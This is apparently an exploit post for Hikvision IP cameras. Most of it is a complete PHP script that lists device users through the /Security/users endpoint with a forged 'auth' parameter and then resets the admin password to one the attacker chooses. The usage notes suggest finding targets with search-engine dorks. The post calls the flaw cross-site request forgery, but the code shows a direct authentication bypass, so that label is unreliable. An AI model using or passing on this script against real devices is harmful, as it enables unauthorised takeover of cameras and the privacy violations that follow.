Headline
Hikvision IP Camera Cross Site Request Forgery
Hikvision IP Cameras suffer from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.hikvision.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The vulnerability has been present in Hikvision products since 2014.[+] add new admin.[+] Line 104 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass HikvisionExploit { private $target; private $port; private $username; private $password; private $id; private $storeCred; public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) { $this->target = $target; $this->port = $port; $this->username = $username; $this->password = $password; $this->id = $id; $this->storeCred = $storeCred; } public function check() { $auth = base64_encode("admin:" . $this->generateRandomPassword()); $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth); $response = $this->sendRequest('GET', $url); if (!$response) { return 'No response received from the target!'; } if ($response['http_code'] == 200) { echo "Following users are available for password reset...\n"; $xml = simplexml_load_string($response['body']); foreach ($xml->User as $user) { echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n"; } return 'Vulnerable'; } else { return 'Safe'; } } public function exploit() { if ($this->check() !== 'Vulnerable') { return false; } echo "Starting the password reset for {$this->username}...\n"; $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" . "<id>{$this->id}</id>\r\n" . "<userName>{$this->username}</userName>\r\n" . "<password>{$this->password}</password>\r\n</User>"; $auth = base64_encode("admin:" . $this->generateRandomPassword()); $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth); $response = $this->sendRequest('PUT', $url, $postData, 'application/xml'); if (!$response) { echo "Target server did not respond to the password reset request\n"; return false; } if ($response['http_code'] == 200) { echo "Password reset for {$this->username} was successfully completed!\n"; echo "Please log in with your new password: {$this->password}\n"; if ($this->storeCred) { $this->reportCreds(); } } else { echo "Unknown Error. Password reset was not successful!\n"; } } private function sendRequest($method, $url, $data = null, $contentType = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if ($contentType) { curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['http_code' => $http_code, 'body' => $response]; } private function generateRandomPassword($length = 10) { return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length); } private function reportCreds() { // In a real implementation, you could store the credentials into a database echo "Credentials for {$this->username} were added to the database...\n"; }}// Example usage$exploit = new HikvisionExploit('target-ip');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================